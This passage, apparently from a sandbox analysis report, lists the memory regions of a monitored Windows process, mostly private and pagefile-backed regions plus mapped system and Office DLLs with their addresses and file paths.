"private_0x00000000088f0000" filename = "" Region: id = 563 start_va = 0x89f0000 end_va = 0x8a6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000089f0000" filename = "" Region: id = 564 start_va = 0x8ba0000 end_va = 0x8d9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008ba0000" filename = "" Region: id = 565 start_va = 0x8e70000 end_va = 0x8eeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008e70000" filename = "" Region: id = 566 start_va = 0x8f70000 end_va = 0x8feffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008f70000" filename = "" Region: id = 567 start_va = 0x90f0000 end_va = 0x916ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000090f0000" filename = "" Region: id = 568 start_va = 0x9170000 end_va = 0x91effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009170000" filename = "" Region: id = 569 start_va = 0x91f0000 end_va = 0x926ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000091f0000" filename = "" Region: id = 570 start_va = 0x93f0000 end_va = 0x946ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000093f0000" filename = "" Region: id = 571 start_va = 0x9470000 end_va = 0x94effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009470000" filename = "" Region: id = 572 start_va = 0x94f0000 end_va = 0x956ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000094f0000" filename = "" Region: id = 573 start_va = 0x9570000 end_va = 0x95effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009570000" filename = "" Region: id = 574 start_va = 0x97f0000 end_va = 0x986ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000097f0000" filename = "" Region: id = 575 start_va = 0x9f70000 end_va = 0xa36ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009f70000" filename = "" Region: id = 576 start_va = 0xa370000 end_va = 0xad6ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000a370000" filename = "" Region: id = 577 start_va = 0xadf0000 end_va = 0xae6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000adf0000" filename = "" Region: id = 578 start_va = 0xaff0000 end_va = 0xb06ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000aff0000" filename = "" Region: id = 579 start_va = 0xb0f0000 end_va = 0xb16ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b0f0000" filename = "" Region: id = 580 start_va = 0xb2f0000 end_va = 0xb36ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b2f0000" filename = "" Region: id = 581 start_va = 0xb470000 end_va = 0xb4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b470000" filename = "" Region: id = 582 start_va = 0xb770000 end_va = 0xb7effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b770000" filename = "" Region: id = 583 start_va = 0xb970000 end_va = 0xb9effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b970000" filename = "" Region: id = 584 start_va = 0xcaf0000 end_va = 0xcb6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000caf0000" filename = "" Region: id = 585 start_va = 0xfb70000 end_va = 0xfbeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000fb70000" filename = "" Region: id = 586 start_va = 0xfbf0000 end_va = 0xfc6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000fbf0000" filename = "" Region: id = 587 start_va = 0xfc70000 end_va = 0xfceffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000fc70000" filename = "" Region: id = 588 start_va = 0xfcf0000 end_va = 0xfd6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000fcf0000" filename = "" Region: id = 589 start_va = 0xfd70000 end_va = 0xfdeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000fd70000" filename = "" Region: id = 590 start_va = 0xfdf0000 end_va = 0xfe6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000fdf0000" filename = "" Region: id = 591 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 592 start_va = 0x180000000 end_va = 0x18087dfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "grooveintlresource.dll" filename = "\\PROGRA~1\\MICROS~1\\Office16\\1033\\GrooveIntlResource.dll" (normalized: "c:\\program files\\micros~1\\office16\\1033\\grooveintlresource.dll") Region: id = 593 start_va = 0x7df5ffec0000 end_va = 0x7df5fffbffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffec0000" filename = "" Region: id = 594 start_va = 0x7df5fffc0000 end_va = 0x7df5fffe2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5fffc0000" filename = "" Region: id = 595 start_va = 0x7df5ffff0000 end_va = 0x7ff5fffeffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffff0000" filename = "" Region: id = 596 start_va = 0x7ff7a75c0000 end_va = 0x7ff7a7a07fff monitored = 0 entry_point = 0x7ff7a765e090 region_type = mapped_file name = "explorer.exe" filename = "\\Windows\\explorer.exe" (normalized: "c:\\windows\\explorer.exe") Region: id = 597 start_va = 0x7ff9fe070000 end_va = 0x7ff9fe11bfff monitored = 0 entry_point = 0x7ff9fe0759c0 region_type = mapped_file name = "ieproxy.dll" filename = "\\Windows\\System32\\ieproxy.dll" (normalized: "c:\\windows\\system32\\ieproxy.dll") Region: id = 598 start_va = 0x7ff9fe4a0000 end_va = 0x7ff9fe4effff monitored = 0 entry_point = 0x7ff9fe4d1220 region_type = mapped_file name = "windows.system.launcher.dll" filename = "\\Windows\\System32\\Windows.System.Launcher.dll" (normalized: "c:\\windows\\system32\\windows.system.launcher.dll") Region: id = 599 start_va = 0x7ff9fe5a0000 end_va = 0x7ff9ff26cfff monitored = 0 entry_point = 0x7ff9fe6ee880 region_type = mapped_file name = "ieframe.dll" filename = "\\Windows\\System32\\ieframe.dll" (normalized: "c:\\windows\\system32\\ieframe.dll") Region: id = 600 start_va = 0x7ffa00480000 end_va = 0x7ffa007c5fff monitored = 0 entry_point = 0x7ffa00488530 region_type = mapped_file name = "synccenter.dll" filename = "\\Windows\\System32\\SyncCenter.dll" (normalized: "c:\\windows\\system32\\synccenter.dll") Region: id = 601 start_va = 0x7ffa007d0000 end_va = 0x7ffa0098ffff monitored = 0 entry_point = 0x7ffa007d9e40 region_type = mapped_file name = "pnidui.dll" filename = "\\Windows\\System32\\pnidui.dll" (normalized: "c:\\windows\\system32\\pnidui.dll") Region: id = 602 start_va = 0x7ffa00990000 end_va = 0x7ffa00a17fff monitored = 0 entry_point = 0x7ffa009a4510 region_type = mapped_file name = "audioses.dll" filename = "\\Windows\\System32\\AudioSes.dll" (normalized: "c:\\windows\\system32\\audioses.dll") Region: id = 603 start_va = 0x7ffa00a20000 end_va = 0x7ffa00c62fff monitored = 0 entry_point = 0x7ffa00a236c0 region_type = mapped_file name = "authui.dll" filename = "\\Windows\\System32\\authui.dll" (normalized: "c:\\windows\\system32\\authui.dll") Region: id = 604 start_va = 0x7ffa00cf0000 end_va = 0x7ffa00d3ffff monitored = 0 entry_point = 0x7ffa00cfbe50 region_type = mapped_file name = "actioncenter.dll" filename = "\\Windows\\System32\\ActionCenter.dll" (normalized: "c:\\windows\\system32\\actioncenter.dll") Region: id = 605 start_va = 0x7ffa00d40000 end_va = 0x7ffa00d81fff monitored = 0 entry_point = 0x7ffa00d42230 region_type = mapped_file name = "shdocvw.dll" filename = "\\Windows\\System32\\shdocvw.dll" (normalized: "c:\\windows\\system32\\shdocvw.dll") Region: id = 606 start_va = 0x7ffa00d90000 end_va = 0x7ffa00e08fff monitored = 0 entry_point = 0x7ffa00d922d0 region_type = mapped_file name = "dxp.dll" filename = "\\Windows\\System32\\DXP.dll" (normalized: "c:\\windows\\system32\\dxp.dll") Region: id = 607 start_va = 0x7ffa00e10000 end_va = 0x7ffa00e8afff monitored = 0 entry_point = 0x7ffa00e13af0 region_type = mapped_file name = "prnfldr.dll" filename = "\\Windows\\System32\\prnfldr.dll" (normalized: "c:\\windows\\system32\\prnfldr.dll") Region: id = 608 start_va = 0x7ffa00e90000 end_va = 0x7ffa00fe9fff monitored = 0 entry_point = 0x7ffa00e94610 region_type = mapped_file name = "windows.ui.shell.dll" filename = "\\Windows\\System32\\Windows.UI.Shell.dll" (normalized: "c:\\windows\\system32\\windows.ui.shell.dll") Region: id = 609 start_va = 0x7ffa00ff0000 end_va = 0x7ffa011edfff monitored = 0 entry_point = 0x7ffa00ff16c0 region_type = mapped_file name = "batmeter.dll" filename = "\\Windows\\System32\\batmeter.dll" (normalized: "c:\\windows\\system32\\batmeter.dll") Region: id = 610 start_va = 0x7ffa011f0000 end_va = 0x7ffa01253fff monitored = 0 entry_point = 0x7ffa011f6b20 region_type = mapped_file name = "stobject.dll" filename = "\\Windows\\System32\\stobject.dll" (normalized: "c:\\windows\\system32\\stobject.dll") Region: id = 611 start_va = 0x7ffa01360000 end_va = 0x7ffa014a0fff monitored = 0 entry_point = 0x7ffa01365f70 region_type = mapped_file name = "werconcpl.dll" filename = "\\Windows\\System32\\werconcpl.dll" (normalized: "c:\\windows\\system32\\werconcpl.dll") Region: id = 612 start_va = 0x7ffa014b0000 end_va = 0x7ffa01658fff monitored = 0 entry_point = 0x7ffa01504060 region_type = mapped_file name = "gdiplus.dll" filename = "\\Windows\\WinSxS\\amd64_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.10586.0_none_0bdd1d3064f6384a\\GdiPlus.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.10586.0_none_0bdd1d3064f6384a\\gdiplus.dll") Region: id = 613 start_va = 0x7ffa017f0000 end_va = 0x7ffa0182dfff monitored = 0 entry_point = 0x7ffa017f9650 region_type = mapped_file name = "mlang.dll" filename = "\\Windows\\System32\\mlang.dll" (normalized: "c:\\windows\\system32\\mlang.dll") Region: id = 614 start_va = 0x7ffa058a0000 end_va = 0x7ffa058fbfff monitored = 0 entry_point = 0x7ffa058b7190 region_type = mapped_file name = "ninput.dll" filename = "\\Windows\\System32\\ninput.dll" (normalized: "c:\\windows\\system32\\ninput.dll") Region: id = 615 start_va = 0x7ffa05900000 end_va = 0x7ffa05996fff monitored = 0 entry_point = 0x7ffa0590ddc0 region_type = mapped_file name = "wlidprov.dll" filename = "\\Windows\\System32\\wlidprov.dll" (normalized: "c:\\windows\\system32\\wlidprov.dll") Region: id = 616 start_va = 0x7ffa059a0000 end_va = 0x7ffa059abfff monitored = 0 entry_point = 0x7ffa059a14b0 region_type = mapped_file name = "notificationcontrollerps.dll" filename = "\\Windows\\System32\\NotificationControllerPS.dll" (normalized: "c:\\windows\\system32\\notificationcontrollerps.dll") Region: id = 617 start_va = 0x7ffa059c0000 end_va = 0x7ffa05c39fff monitored = 0 entry_point = 0x7ffa059da7a0 region_type = mapped_file name = "msxml6.dll" filename = "\\Windows\\System32\\msxml6.dll" (normalized: "c:\\windows\\system32\\msxml6.dll") Region: id = 618 start_va = 0x7ffa05c80000 end_va = 0x7ffa05ca5fff monitored = 0 entry_point = 0x7ffa05c95cb0 region_type = mapped_file name = "npsm.dll" filename = "\\Windows\\System32\\NPSM.dll" (normalized: "c:\\windows\\system32\\npsm.dll") Region: id = 619 start_va = 0x7ffa05cb0000 end_va = 0x7ffa05cdafff monitored = 0 entry_point = 0x7ffa05cb4240 region_type = mapped_file name = "abovelockapphost.dll" filename = "\\Windows\\System32\\AboveLockAppHost.dll" (normalized: "c:\\windows\\system32\\abovelockapphost.dll") Region: id = 620 start_va = 0x7ffa05ce0000 end_va = 0x7ffa05d27fff monitored = 0 entry_point = 0x7ffa05cea430 region_type = mapped_file name = "notificationobjfactory.dll" filename = "\\Windows\\System32\\NotificationObjFactory.dll" (normalized: "c:\\windows\\system32\\notificationobjfactory.dll") Region: id = 621 start_va = 0x7ffa05d30000 end_va = 0x7ffa05db5fff monitored = 0 entry_point = 0x7ffa05d51e10 region_type = mapped_file name = "notificationcontroller.dll" filename = "\\Windows\\System32\\NotificationController.dll" (normalized: "c:\\windows\\system32\\notificationcontroller.dll") Region: id = 622 start_va = 0x7ffa05e50000 end_va = 0x7ffa05e6afff monitored = 0 entry_point = 0x7ffa05e5af40 region_type = mapped_file name = "capauthz.dll" filename = "\\Windows\\System32\\capauthz.dll" (normalized: "c:\\windows\\system32\\capauthz.dll") Region: id = 623 start_va = 0x7ffa05e90000 end_va = 0x7ffa05f69fff monitored = 0 entry_point = 0x7ffa05ec3c00 region_type = mapped_file name = "wpncore.dll" filename = "\\Windows\\System32\\wpncore.dll" (normalized: "c:\\windows\\system32\\wpncore.dll") Region: id = 624 start_va = 0x7ffa05f70000 end_va = 0x7ffa06035fff monitored = 0 entry_point = 0x7ffa05f73ac0 region_type = mapped_file name = "cscui.dll" filename = "\\Windows\\System32\\cscui.dll" (normalized: "c:\\windows\\system32\\cscui.dll") Region: id = 625 start_va = 0x7ffa06040000 end_va = 0x7ffa06076fff monitored = 0 entry_point = 0x7ffa060420a0 region_type = mapped_file name = "ehstorshell.dll" filename = "\\Windows\\System32\\EhStorShell.dll" (normalized: "c:\\windows\\system32\\ehstorshell.dll") Region: id = 626 start_va = 0x7ffa06080000 end_va = 0x7ffa063b9fff monitored = 0 entry_point = 0x7ffa06088520 region_type = mapped_file name = "msi.dll" filename = "\\Windows\\System32\\msi.dll" (normalized: "c:\\windows\\system32\\msi.dll") Region: id = 627 start_va = 0x7ffa063c0000 end_va = 0x7ffa063cbfff monitored = 0 entry_point = 0x7ffa063c4150 region_type = mapped_file name = "vcruntime140_1.dll" filename = "\\Windows\\System32\\vcruntime140_1.dll" (normalized: "c:\\windows\\system32\\vcruntime140_1.dll") Region: id = 628 start_va = 0x7ffa063d0000 end_va = 0x7ffa06460fff monitored = 0 entry_point = 0x7ffa06422430 region_type = mapped_file name = "msvcp140.dll" filename = "\\Windows\\System32\\msvcp140.dll" (normalized: "c:\\windows\\system32\\msvcp140.dll") Region: id = 629 start_va = 0x7ffa06470000 end_va = 0x7ffa06488fff monitored = 0 entry_point = 0x7ffa0647ee50 region_type = mapped_file name = "vcruntime140.dll" filename = "\\Windows\\System32\\vcruntime140.dll" (normalized: "c:\\windows\\system32\\vcruntime140.dll") Region: id = 630 start_va = 0x7ffa06490000 end_va = 0x7ffa066a3fff monitored = 0 entry_point = 0x7ffa06491000 region_type = mapped_file name = "grooveex.dll" filename = "\\PROGRA~1\\MICROS~1\\Office16\\GROOVEEX.DLL" (normalized: "c:\\program files\\micros~1\\office16\\grooveex.dll") Region: id = 631 start_va = 0x7ffa066b0000 end_va = 0x7ffa066bcfff monitored = 0 entry_point = 0x7ffa066b1ea0 region_type = mapped_file name = "linkinfo.dll" filename = "\\Windows\\System32\\linkinfo.dll" (normalized: "c:\\windows\\system32\\linkinfo.dll") Region: id = 632 start_va = 0x7ffa066c0000 end_va = 0x7ffa0670cfff monitored = 0 entry_point = 0x7ffa066d7de0 region_type = mapped_file name = "thumbcache.dll" filename = "\\Windows\\System32\\thumbcache.dll" (normalized: "c:\\windows\\system32\\thumbcache.dll") Region: id = 633 start_va = 0x7ffa06710000 end_va = 0x7ffa0682ffff monitored = 0 entry_point = 0x7ffa06748310 region_type = mapped_file name = "applicationframe.dll" filename = "\\Windows\\System32\\ApplicationFrame.dll" (normalized: "c:\\windows\\system32\\applicationframe.dll") Region: id = 634 start_va = 0x7ffa06830000 end_va = 0x7ffa06855fff monitored = 0 entry_point = 0x7ffa06831cf0 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 635 start_va = 0x7ffa06860000 end_va = 0x7ffa0693afff monitored = 0 entry_point = 0x7ffa068728b0 region_type = mapped_file name = "ntshrui.dll" filename = "\\Windows\\System32\\ntshrui.dll" (normalized: "c:\\windows\\system32\\ntshrui.dll") Region: id = 636 start_va = 0x7ffa06960000 end_va = 0x7ffa06981fff monitored = 0 entry_point = 0x7ffa06962580 region_type = mapped_file name = "wcmapi.dll" filename = "\\Windows\\System32\\wcmapi.dll" (normalized: "c:\\windows\\system32\\wcmapi.dll") Region: id = 637 start_va = 0x7ffa069a0000 end_va = 0x7ffa069b5fff monitored = 0 entry_point = 0x7ffa069a1d50 region_type = mapped_file name = "wwapi.dll" filename = "\\Windows\\System32\\wwapi.dll" (normalized: "c:\\windows\\system32\\wwapi.dll") Region: id = 638 start_va = 0x7ffa069c0000 end_va = 0x7ffa069cbfff monitored = 0 entry_point = 0x7ffa069c18b0 region_type = mapped_file name = "wldp.dll" filename = "\\Windows\\System32\\wldp.dll" (normalized: "c:\\windows\\system32\\wldp.dll") Region: id = 639 start_va = 0x7ffa069d0000 end_va = 0x7ffa06a1cfff monitored = 0 entry_point = 0x7ffa069dd180 region_type = mapped_file name = "windows.immersiveshell.serviceprovider.dll" filename = "\\Windows\\System32\\windows.immersiveshell.serviceprovider.dll" (normalized: "c:\\windows\\system32\\windows.immersiveshell.serviceprovider.dll") Region: id = 640 start_va = 0x7ffa06a20000 end_va = 0x7ffa0752afff monitored = 0 entry_point = 0x7ffa06b6a540 region_type = mapped_file name = "twinui.dll" filename = "\\Windows\\System32\\twinui.dll" (normalized: "c:\\windows\\system32\\twinui.dll") Region: id = 641 start_va = 0x7ffa07530000 end_va = 0x7ffa0757ffff monitored = 0 entry_point = 0x7ffa07532580 region_type = mapped_file name = "edputil.dll" filename = "\\Windows\\System32\\edputil.dll" (normalized: "c:\\windows\\system32\\edputil.dll") Region: id = 642 start_va = 0x7ffa07580000 end_va = 0x7ffa07a1ffff monitored = 0 entry_point = 0x7ffa07618740 region_type = mapped_file name = "explorerframe.dll" filename = "\\Windows\\System32\\ExplorerFrame.dll" (normalized: "c:\\windows\\system32\\explorerframe.dll") Region: id = 643 start_va = 0x7ffa07bd0000 end_va = 0x7ffa07c19fff monitored = 0 entry_point = 0x7ffa07bd5800 region_type = mapped_file name = "dataexchange.dll" filename = "\\Windows\\System32\\DataExchange.dll" (normalized: "c:\\windows\\system32\\dataexchange.dll") Region: id = 644 start_va = 0x7ffa07fa0000 end_va = 0x7ffa07fb4fff monitored = 0 entry_point = 0x7ffa07fa5740 region_type = mapped_file name = "profext.dll" filename = "\\Windows\\System32\\profext.dll" (normalized: "c:\\windows\\system32\\profext.dll") Region: id = 645 start_va = 0x7ffa07fc0000 end_va = 0x7ffa0800afff monitored = 0 entry_point = 0x7ffa07fd1590 region_type = mapped_file name = "vaultcli.dll" filename = "\\Windows\\System32\\vaultcli.dll" (normalized: "c:\\windows\\system32\\vaultcli.dll") Region: id = 646 start_va = 0x7ffa08010000 end_va = 0x7ffa08079fff monitored = 0 entry_point = 0x7ffa08025e90 region_type = mapped_file name = "oleacc.dll" filename = "\\Windows\\System32\\oleacc.dll" (normalized: "c:\\windows\\system32\\oleacc.dll") Region: id = 647 start_va = 0x7ffa08080000 end_va = 0x7ffa080e4fff monitored = 0 entry_point = 0x7ffa08084c50 region_type = mapped_file name = "sndvolsso.dll" filename = "\\Windows\\System32\\SndVolSSO.dll" (normalized: "c:\\windows\\system32\\sndvolsso.dll") Region: id = 648 start_va = 0x7ffa080f0000 end_va = 0x7ffa08363fff monitored = 0 entry_point = 0x7ffa08160400 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\WinSxS\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10586.0_none_8c15ae12515e1c22\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10586.0_none_8c15ae12515e1c22\\comctl32.dll") Region: id = 649 start_va = 0x7ffa08370000 end_va = 0x7ffa08384fff monitored = 0 entry_point = 0x7ffa08372c90 region_type = mapped_file name = "settingsyncpolicy.dll" filename = "\\Windows\\System32\\SettingSyncPolicy.dll" (normalized: "c:\\windows\\system32\\settingsyncpolicy.dll") Region: id = 650 start_va = 0x7ffa084a0000 end_va = 0x7ffa08598fff monitored = 0 entry_point = 0x7ffa084e8000 region_type = mapped_file name = "settingsynccore.dll" filename = "\\Windows\\System32\\SettingSyncCore.dll" (normalized: "c:\\windows\\system32\\settingsynccore.dll") Region: id = 651 start_va = 0x7ffa085c0000 end_va = 0x7ffa0884dfff monitored = 0 entry_point = 0x7ffa08690f00 region_type = mapped_file name = "wininet.dll" filename = "\\Windows\\System32\\wininet.dll" (normalized: "c:\\windows\\system32\\wininet.dll") Region: id = 652 start_va = 0x7ffa08a00000 end_va = 0x7ffa08a0bfff monitored = 0 entry_point = 0x7ffa08a035c0 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\System32\\secur32.dll" (normalized: "c:\\windows\\system32\\secur32.dll") Region: id = 653 start_va = 0x7ffa08ab0000 end_va = 0x7ffa08ac6fff monitored = 0 entry_point = 0x7ffa08ab2790 region_type = mapped_file name = "syncreg.dll" filename = "\\Windows\\System32\\Syncreg.dll" (normalized: "c:\\windows\\system32\\syncreg.dll") Region: id = 654 start_va = 0x7ffa08ad0000 end_va = 0x7ffa08adffff monitored = 0 entry_point = 0x7ffa08ad78e0 region_type = mapped_file name = "atlthunk.dll" filename = "\\Windows\\System32\\atlthunk.dll" (normalized: "c:\\windows\\system32\\atlthunk.dll") Region: id = 655 start_va = 0x7ffa08ba0000 end_va = 0x7ffa08c50fff monitored = 0 entry_point = 0x7ffa08bb08f0 region_type = mapped_file name = "twinapi.dll" filename = "\\Windows\\System32\\twinapi.dll" (normalized: "c:\\windows\\system32\\twinapi.dll") Region: id = 656 start_va = 0x7ffa08df0000 end_va = 0x7ffa08dfbfff monitored = 0 entry_point = 0x7ffa08df1470 region_type = mapped_file name = "dsclient.dll" filename = "\\Windows\\System32\\dsclient.dll" (normalized: "c:\\windows\\system32\\dsclient.dll") Region: id = 657 start_va = 0x7ffa08e00000 end_va = 0x7ffa08e1efff monitored = 0 entry_point = 0x7ffa08e037e0 region_type = mapped_file name = "netsetupapi.dll" filename = "\\Windows\\System32\\NetSetupApi.dll" (normalized: "c:\\windows\\system32\\netsetupapi.dll") Region: id = 658 start_va = 0x7ffa08e20000 end_va = 0x7ffa08e98fff monitored = 0 entry_point = 0x7ffa08e276a0 region_type = mapped_file name = "netsetupshim.dll" filename = "\\Windows\\System32\\NetSetupShim.dll" (normalized: "c:\\windows\\system32\\netsetupshim.dll") Region: id = 659 start_va = 0x7ffa08eb0000 end_va = 0x7ffa08eeffff monitored = 0 entry_point = 0x7ffa08ec6c60 region_type = mapped_file name = "netprofm.dll" filename = "\\Windows\\System32\\netprofm.dll" (normalized: "c:\\windows\\system32\\netprofm.dll") Region: id = 660 start_va = 0x7ffa09580000 end_va = 0x7ffa09737fff monitored = 0 entry_point = 0x7ffa095ee630 region_type = mapped_file name = "urlmon.dll" filename = "\\Windows\\System32\\urlmon.dll" (normalized: "c:\\windows\\system32\\urlmon.dll") Region: id = 661 start_va = 0x7ffa09dd0000 end_va = 0x7ffa09e63fff monitored = 0 entry_point = 0x7ffa09e09210 region_type = mapped_file name = "staterepository.core.dll" filename = "\\Windows\\System32\\StateRepository.Core.dll" (normalized: "c:\\windows\\system32\\staterepository.core.dll") Region: id = 662 start_va = 0x7ffa09e70000 end_va = 0x7ffa0a112fff monitored = 0 entry_point = 0x7ffa09e96190 region_type = mapped_file name = "windows.staterepository.dll" filename = "\\Windows\\System32\\Windows.StateRepository.dll" (normalized: "c:\\windows\\system32\\windows.staterepository.dll") Region: id = 663 start_va = 0x7ffa0a120000 end_va = 0x7ffa0a134fff monitored = 0 entry_point = 0x7ffa0a121ab0 region_type = mapped_file name = "execmodelproxy.dll" filename = "\\Windows\\System32\\execmodelproxy.dll" (normalized: "c:\\windows\\system32\\execmodelproxy.dll") Region: id = 664 start_va = 0x7ffa0a1c0000 end_va = 0x7ffa0a1eafff monitored = 0 entry_point = 0x7ffa0a1cc3c0 region_type = mapped_file name = "rtworkq.dll" filename = "\\Windows\\System32\\RTWorkQ.dll" (normalized: "c:\\windows\\system32\\rtworkq.dll") Region: id = 665 start_va = 0x7ffa0a1f0000 end_va = 0x7ffa0a2fcfff monitored = 0 entry_point = 0x7ffa0a21f420 region_type = mapped_file name = "mfplat.dll" filename = "\\Windows\\System32\\mfplat.dll" (normalized: "c:\\windows\\system32\\mfplat.dll") Region: id = 666 start_va = 0x7ffa0a380000 end_va = 0x7ffa0a3defff monitored = 0 entry_point = 0x7ffa0a3abce0 region_type = mapped_file name = "dsreg.dll" filename = "\\Windows\\System32\\dsreg.dll" (normalized: "c:\\windows\\system32\\dsreg.dll") Region: id = 667 start_va = 0x7ffa0a490000 end_va = 0x7ffa0a55dfff monitored = 0 entry_point = 0x7ffa0a4c14c0 region_type = mapped_file name = "tokenbroker.dll" filename = "\\Windows\\System32\\TokenBroker.dll" (normalized: "c:\\windows\\system32\\tokenbroker.dll") Region: id = 668 start_va = 0x7ffa0a790000 end_va = 0x7ffa0a9ecfff monitored = 0 entry_point = 0x7ffa0a818610 region_type = mapped_file name = "twinui.appcore.dll" filename = "\\Windows\\System32\\twinui.appcore.dll" (normalized: "c:\\windows\\system32\\twinui.appcore.dll") Region: id = 669 start_va = 0x7ffa0a9f0000 end_va = 0x7ffa0a9f8fff monitored = 0 entry_point = 0x7ffa0a9f1480 region_type = mapped_file name = "wpportinglibrary.dll" filename = "\\Windows\\System32\\WpPortingLibrary.dll" (normalized: "c:\\windows\\system32\\wpportinglibrary.dll") Region: id = 670 start_va = 0x7ffa0ad90000 end_va = 0x7ffa0addafff monitored = 0 entry_point = 0x7ffa0ada7b70 region_type = mapped_file name = "veeventdispatcher.dll" filename = "\\Windows\\System32\\VEEventDispatcher.dll" (normalized: "c:\\windows\\system32\\veeventdispatcher.dll") Region: id = 671 start_va = 0x7ffa0afc0000 end_va = 0x7ffa0afd1fff monitored = 0 entry_point = 0x7ffa0afc3580 region_type = mapped_file name = "cscapi.dll" filename = "\\Windows\\System32\\cscapi.dll" (normalized: "c:\\windows\\system32\\cscapi.dll") Region: id = 672 start_va = 0x7ffa0aff0000 end_va = 0x7ffa0affbfff monitored = 0 entry_point = 0x7ffa0aff1860 region_type = mapped_file name = "davhlpr.dll" filename = "\\Windows\\System32\\davhlpr.dll" (normalized: "c:\\windows\\system32\\davhlpr.dll") Region: id = 673 start_va = 0x7ffa0b000000 end_va = 0x7ffa0b01ffff monitored = 0 entry_point = 0x7ffa0b001920 region_type = mapped_file name = "davclnt.dll" filename = "\\Windows\\System32\\davclnt.dll" (normalized: "c:\\windows\\system32\\davclnt.dll") Region: id = 674 start_va = 0x7ffa0b020000 end_va = 0x7ffa0b035fff monitored = 0 entry_point = 0x7ffa0b023380 region_type = mapped_file name = "ntlanman.dll" filename = "\\Windows\\System32\\ntlanman.dll" (normalized: "c:\\windows\\system32\\ntlanman.dll") Region: id = 675 start_va = 0x7ffa0b040000 end_va = 0x7ffa0b04afff monitored = 0 entry_point = 0x7ffa0b041a40 region_type = mapped_file name = "drprov.dll" filename = "\\Windows\\System32\\drprov.dll" (normalized: "c:\\windows\\system32\\drprov.dll") Region: id = 676 start_va = 0x7ffa0b050000 end_va = 0x7ffa0b06afff monitored = 0 entry_point = 0x7ffa0b051040 region_type = mapped_file name = "mpr.dll" filename = "\\Windows\\System32\\mpr.dll" (normalized: "c:\\windows\\system32\\mpr.dll") Region: id = 677 start_va = 0x7ffa0b070000 end_va = 0x7ffa0b2f7fff monitored = 0 entry_point = 0x7ffa0b0cf670 region_type = mapped_file name = "coreuicomponents.dll" filename = "\\Windows\\System32\\CoreUIComponents.dll" (normalized: "c:\\windows\\system32\\coreuicomponents.dll") Region: id = 678 start_va = 0x7ffa0b320000 end_va = 0x7ffa0b32dfff monitored = 0 entry_point = 0x7ffa0b321460 region_type = mapped_file name = "npmproxy.dll" filename = "\\Windows\\System32\\npmproxy.dll" (normalized: "c:\\windows\\system32\\npmproxy.dll") Region: id = 679 start_va = 0x7ffa0b630000 end_va = 0x7ffa0b63ffff monitored = 0 entry_point = 0x7ffa0b633d50 region_type = mapped_file name = "pcacli.dll" filename = "\\Windows\\System32\\pcacli.dll" (normalized: "c:\\windows\\system32\\pcacli.dll") Region: id = 680 start_va = 0x7ffa0b920000 end_va = 0x7ffa0b98cfff monitored = 0 entry_point = 0x7ffa0b92d750 region_type = mapped_file name = "photometadatahandler.dll" filename = "\\Windows\\System32\\PhotoMetadataHandler.dll" (normalized: "c:\\windows\\system32\\photometadatahandler.dll") Region: id = 681 start_va = 0x7ffa0b9f0000 end_va = 0x7ffa0ba09fff monitored = 0 entry_point = 0x7ffa0b9f2430 region_type = mapped_file name = "dhcpcsvc.dll" filename = "\\Windows\\System32\\dhcpcsvc.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc.dll") Region: id = 682 start_va = 0x7ffa0ba10000 end_va = 0x7ffa0ba25fff monitored = 0 entry_point = 0x7ffa0ba119f0 region_type = mapped_file name = "dhcpcsvc6.dll" filename = "\\Windows\\System32\\dhcpcsvc6.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc6.dll") Region: id = 683 start_va = 0x7ffa0bac0000 end_va = 0x7ffa0bae7fff monitored = 0 entry_point = 0x7ffa0bac8c10 region_type = mapped_file name = "idstore.dll" filename = "\\Windows\\System32\\IDStore.dll" (normalized: "c:\\windows\\system32\\idstore.dll") Region: id = 684 start_va = 0x7ffa0baf0000 end_va = 0x7ffa0bb27fff monitored = 0 entry_point = 